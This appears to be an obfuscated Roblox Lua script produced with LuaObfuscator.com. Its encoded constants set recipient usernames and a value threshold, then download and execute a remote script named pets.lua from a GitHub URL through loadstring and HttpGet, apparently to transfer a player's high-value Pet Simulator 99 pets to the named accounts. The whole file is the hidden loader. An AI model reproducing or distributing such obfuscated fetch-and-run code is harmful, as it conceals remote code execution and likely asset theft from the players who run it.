--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v80=0;while true do if (v80==0) then v19=v0(v3(v30,1,1));return "";end end else local v81=v2(v0(v30,16));if v19 then local v91=0;local v92;while true do if (v91==1) then return v92;end if (v91==0) then v92=v5(v81,v19);v19=nil;v91=1;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=0;local v83;while true do if (v82==0) then v83=(v31/((5 -(880 -(282 + 595)))^(v32-((1639 -(1523 + 114)) -(1 + 0)))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%(569 -(367 + (286 -85)))) ;end end else local v84=(929 -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and 1) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + 2 ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * (16441815 + 335401)) + (v40 * ((26679 -12146) + 51003)) + (v39 * (1213 -(892 + 65))) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;v37=1 -0 ;end end end local function v24() local v42=350 -(87 + 263) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(181 -(67 + 113))) then v45=1 + 0 ;v46=(v20(v44,1,20) * ((2 + 0)^(78 -46))) + v43 ;v42=2 + 0 ;end if (v42==((12 -5) -5)) then v47=v20(v44,973 -((1240 -(145 + 293)) + 150) ,83 -52 );v48=((v20(v44,57 -25 )==(1 + (430 -(44 + 386)))) and  -(998 -(915 + 82))) or (2 -1) ;v42=2 + (1487 -(998 + 488)) ;end if (v42==((0 + 0) -0)) then v43=v23();v44=v23();v42=(973 + 215) -(1069 + 118) ;end if (v42==(6 -3)) then if (v47==(0 -0)) then if (v46==(772 -(201 + 571))) then return v48 * (0 + 0) ;else v47=1 -(1138 -(116 + 1022)) ;v45=(0 -0) + 0 ;end elseif (v47==2047) then return ((v46==(791 -(368 + 423))) and (v48 * ((3 -2)/(18 -(10 + 8))))) or (v48 * NaN) ;end return v8(v48,v47-(3934 -2911) ) * (v45 + (v46/((444 -(416 + 26))^(165 -113)))) ;end end end local function v25(v49) local v50=885 -(261 + 624) ;local v51;local v52;while true do if (v50==((1750 -(760 + 987)) -1)) then v52={};for v93=1081 -(1020 + 60) , #v51 do v52[v93]=v2(v1(v3(v51,v93,v93)));end v50=2 + 1 ;end if ((10 -7)==v50) then return v6(v52);end if (v50==(3 -2)) then v51=v3(v16,v18,(v18 + v49) -(860 -(814 + 45)) );v18=v18 + v49 ;v50=4 -(1915 -(1789 + 124)) ;end if (v50==((766 -(745 + 21)) + 0)) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=1707 -(856 + 851) ;local v54;local v55;local v56;local v57;local v58;local v59;while true do if ((1765 -(454 + 1309))~=v53) then else local v87=0 + 0 ;local v88;while true do if (v87~=(0 -0)) then else v88=0 -0 ;while true do local v107=0;while true do if (v107~=(0 -0)) then else if (v88~=(285 -(134 + 151))) then else for v109=1,v23() do local v110=1665 -(970 + 695) ;local v111;local v112;while true do if (0==v110) then v111=0;v112=nil;v110=1 -0 ;end if (v110~=(1991 -(582 + 1408))) then else while true do if (0~=v111) then else v112=v21();if (v20(v112,3 -2 ,1 -0 )~=0) then else local v163=0;local v164;local v165;local v166;local v167;local v168;while true do if (v163~=0) then else local v169=0;while true do if (v169==(0 -0)) then v164=0;v165=nil;v169=1;end if (v169==(1825 -(1195 + 629))) then v163=1;break;end end end if (v163==(1 -0)) then local v170=241 -(187 + 54) ;while true do if (v170==0) then v166=nil;v167=nil;v170=1;end if (1==v170) then v163=2;break;end end end if (v163==2) then v168=nil;while true do if (v164~=2) then else while true do if ((782 -(162 + 618))~=v165) then else local v174=0 + 0 ;local v175;local v176;while true do if (v174~=0) then else v175=0;v176=nil;v174=1 + 0 ;end if (v174~=1) then else while true do if ((0 -0)==v175) then v176=0;while true do if (v176==(1 -0)) then v165=3;break;end if ((0 + 0)==v176) then local v188=0;while true do if (v188==1) then v176=1;break;end if (v188==0) then if (v20(v167,1637 -(1373 + 263) ,1)==(1001 -(451 + 549))) then v168[1 + 1 ]=v59[v168[2 -0 ]];end if (v20(v167,2 -0 ,2)~=(1385 -(746 + 638))) then else v168[2 + 1 ]=v59[v168[4 -1 ]];end v188=1;end end end end break;end end break;end end end if (v165==3) then if (v20(v167,3,344 -(218 + 123) )~=(1582 -(1535 + 46))) then else v168[4]=v59[v168[4 + 0 ]];end v54[v109]=v168;break;end if (v165~=0) then else local v178=0 + 0 ;local v179;while true do if (0==v178) then v179=560 -(306 + 254) ;while true do if (0~=v179) then else v166=v20(v112,2,3);v167=v20(v112,1 + 3 ,11 -5 );v179=1468 -(899 + 568) ;end if (v179~=1) then else v165=1;break;end end break;end end end if (v165==(1 + 0)) then local v180=0;local v181;while true do if (v180~=(0 -0)) then else v181=0;while true do if ((603 -(268 + 335))~=v181) then else v168={v22(),v22(),nil,nil};if (v166==(1456 -(282 + 1174))) then local v185=811 -(569 + 242) ;local v186;local v187;while true do if (v185==1) then while true do if (0==v186) then v187=0 -0 ;while true do if (v187~=0) then else v168[1 + 2 ]=v22();v168[4]=v22();break;end end break;end end break;end if ((1024 -(706 + 318))~=v185) then else v186=0;v187=nil;v185=1;end end elseif (v166==(1252 -(721 + 530))) then v168[3]=v23();elseif (v166==(1273 -(945 + 326))) then v168[7 -4 ]=v23() -((2 + 0)^(716 -(271 + 429))) ;elseif (v166==3) then local v195=0;local v196;while true do if (v195==(0 + 0)) then v196=0;while true do if (v196~=0) then else v168[1503 -(1408 + 92) ]=v23() -(2^(1102 -(461 + 625))) ;v168[1292 -(993 + 295) ]=v22();break;end end break;end end end v181=1;end if (v181==(1 + 0)) then v165=2;break;end end break;end end end end break;end if (v164==1) then local v171=1171 -(418 + 753) ;while true do if (v171~=1) then else v164=1 + 1 ;break;end if (v171==(0 + 0)) then v167=nil;v168=nil;v171=1 + 0 ;end end end if (v164==0) then local v172=0 + 0 ;local v173;while true do if (v172~=(529 -(406 + 123))) then else v173=1769 -(1749 + 20) ;while true do if (1==v173) then v164=1 + 0 ;break;end if (0~=v173) then else local v184=1322 -(1249 + 73) ;while true do if (v184~=0) then else v165=0;v166=nil;v184=1 + 0 ;end if (v184==1) then v173=1146 -(466 + 679) ;break;end end end end break;end end end end break;end end end break;end end break;end end end for v113=1,v23() do v55[v113-(2 -1) ]=v28();end v88=2 -1 ;end if (v88==(1901 -(106 + 1794))) then return v57;end break;end end end break;end end end if (v53==(1 + 0)) then v58=v23();v59={};for v95=1 + 0 ,v58 do local v96=0 -0 ;local v97;local v98;local v99;while true do if (v96==1) then v99=nil;while true do if (v97~=(2 -1)) then else if (v98==(115 -(4 + 110))) then v99=v21()~=(584 -(57 + 527)) ;elseif (v98==(1429 -(41 + 1386))) then v99=v24();elseif (v98~=3) then else v99=v25();end v59[v95]=v99;break;end if (v97==0) then v98=v21();v99=nil;v97=104 -(17 + 86) ;end end break;end if (v96==(0 + 0)) then v97=0;v98=nil;v96=1 -0 ;end end end v57[8 -5 ]=v21();v53=168 -(122 + 44) ;end if (v53==(0 -0)) then local v90=0;while true do if (v90==2) then v53=1;break;end if (v90==0) then v54={};v55={};v90=3 -2 ;end if (v90~=1) then else local v106=0;while true do if (v106==(0 + 0)) then v56={};v57={v54,v55,nil,v56};v106=1;end if (v106==1) then v90=2 + 0 ;break;end end end end end end end local function v29(v60,v61,v62) local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...) local v66=v63;local v67=v64;local v68=v65;local v69=v27;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==1) then if (v79<=9) then if (v79<=4) then if (v79<=1) then if (v79==0) then v76[v78[2]]=v62[v78[3]];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79<=2) then do return;end elseif (v79>3) then local v141=0;local v142;while true do if (v141==0) then v142=v78[2];v76[v142]=v76[v142](v13(v76,v142 + 1 ,v71));break;end end else local v143=v78[2];local v144=v76[v78[3]];v76[v143 + 1 ]=v144;v76[v143]=v144[v78[4]];end elseif (v79<=6) then if (v79>5) then local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==0) then v118=v78[2];v119,v120=v69(v76[v118](v13(v76,v118 + 1 ,v78[3])));v117=1;end if (v117==2) then for v157=v118,v71 do v121=v121 + 1 ;v76[v157]=v119[v121];end break;end if (v117==1) then v71=(v120 + v118) -1 ;v121=0;v117=2;end end else local v122=v78[2];local v123,v124=v69(v76[v122](v13(v76,v122 + 1 ,v78[3])));v71=(v124 + v122) -1 ;local v125=0;for v137=v122,v71 do v125=v125 + 1 ;v76[v137]=v123[v125];end end elseif (v79<=7) then v76[v78[2]]=v62[v78[3]];elseif (v79==8) then v70=v78[3];else v76[v78[2]]=v78[3];end elseif (v79<=14) then if (v79<=11) then if (v79==10) then v62[v78[3]]=v76[v78[2]];else v62[v78[3]]=v76[v78[2]];end elseif (v79<=12) then v76[v78[2]]();elseif (v79==13) then local v151=v78[2];v76[v151]=v76[v151](v13(v76,v151 + 1 ,v71));else v70=v78[3];end elseif (v79<=16) then if (v79>15) then local v132=v78[2];local v133=v76[v78[3]];v76[v132 + 1 ]=v133;v76[v132]=v133[v78[4]];else do return;end end elseif (v79<=17) then v76[v78[2]]();elseif (v79==18) then v76[v78[2]]=v78[3];elseif (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end v70=v70 + 1 ;break;end if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O006D696E5F726170024O0080841E41030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F6269343337612F502O392F6D61696E2F706574732E6C756103083O00557365726E616D65030A3O0072616E69656C5F6A756403093O00557365726E616D653203093O0061677369746D61313200163O0012093O00013O0026013O000D000100020004083O000D0001001209000100043O00120A000100033O001207000100053O001207000200063O002003000200020007001209000400084O0005000200044O000D00013O00022O000C0001000100010004083O001500010026013O0001000100010004083O000100010012090001000A3O00120A000100093O0012090001000C3O00120A0001000B3O0012093O00023O0004083O000100012O000F3O00017O00",v9(),...);
